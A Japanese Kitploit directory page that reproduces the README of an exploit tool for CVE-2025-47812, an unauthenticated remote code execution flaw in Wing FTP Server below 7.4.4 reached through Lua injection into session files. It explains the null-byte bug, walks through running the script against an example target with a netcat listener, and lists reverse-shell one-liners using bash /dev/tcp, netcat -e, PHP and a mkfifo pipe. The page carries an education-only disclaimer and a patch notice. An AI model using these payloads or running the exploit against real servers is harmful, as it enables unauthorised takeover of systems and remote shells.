Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-47812 — Wing FTP Server < 7.4.4の認証なしリモートコード実行エクスプロイト。セッションファイルのLuaインジェクションを介してコマンド実行とリバースシェルを可能にします。 | Kitploit
ツール/GitHubGitHub/blindma1den/cve-2025-47812
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミングリモートアクセスツール
GitHubblindma1den/cve-2025-47812

CVE-2025-47812

Wing FTP Server < 7.4.4の認証なしリモートコード実行エクスプロイト。セッションファイルのLuaインジェクションを介してコマンド実行とリバースシェルを可能にします。

リポジトリを見る
131年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-47812 - Wing FTP Server リモートコード実行 (RCE)

===========================================================

作成者: blindma1den

日付: 2025年7月

エクスプロイト種別: リモートコード実行(認証不要)

対象: Wing FTP Server < 7.4.4

CVSSスコア: 10.0(緊急)


説明

このスクリプトは、Wing FTP ServerのWebインターフェースにおける重大な脆弱性CVE-2025-47812を悪用します。これにより、リモートの攻撃者は認証なしで任意のシステムコマンドを実行したり、リバースシェルを開いたりすることができます。

この欠陥は、ログインフォーム(/loginok.html)におけるヌルバイト(%00)の不適切な処理に起因します。これにより、セッションファイルへのLuaコードインジェクションが可能になり、/dir.html などのエンドポイントにアクセスした際に、そのコードが後で評価されます。


情報源

NVDの説明: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


特徴

  • コマンド実行(例: whoami, uname -a)
  • 複数のリバースシェルペイロード
  • UIDセッションクッキーを自動的に抽出
  • クリーンでモジュール化されたPython 3実装

要件

  • Python 3.7以上
  • requestsモジュール

依存関係のインストール:

root@kitploit:~
pip install requests

使用方法

スクリプトを実行:

root@kitploit:~
python3 wingftp_rce_exploit.py

次の項目が要求されます:

  • ターゲットURL(例: http://127.0.0.1:5466)
  • ユーザー名(デフォルト: anonymous)
  • エクスプロイトモード: [1] コマンドを実行 [2] リバースシェルを起動

使用例

[1] コマンド実行:

root@kitploit:~
ターゲットURL: http://192.168.1.10:5466
ユーザー名: anonymous
選択(1または2): 1
実行するコマンド(デフォルト: whoami): whoami

[2] リバースシェル:

root@kitploit:~
ターゲットURL: http://192.168.1.10:5466
ユーザー名: anonymous
選択(1または2): 2
リバースシェルのIPアドレス: 192.168.1.100
リバースシェルのポート: 4444

シェルを起動する前にリスナーを開始してください:

root@kitploit:~
nc -lvnp 4444

使用ペイロード(リバースシェル)

Bash: bash -i >& /dev/tcp/IP/PORT 0>&1

Python3: python3 -c 'import socket,subprocess,os; ...'

Netcat: nc IP PORT -e /bin/sh

PHP: php -r '$sock=fsockopen("IP",PORT); ...'

FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...


免責事項

このコードは教育目的のみです。所有していない、またはテストする明示的な許可を得ていないシステムに対して、このエクスプロイトを使用しないでください。不正使用は違法かつ非倫理的です。

直ちにシステムにパッチを適用してください。Wing FTP Server 7.4.4 はこの脆弱性を修正しています。

ハッピーハッキング!

ツールをダウンロード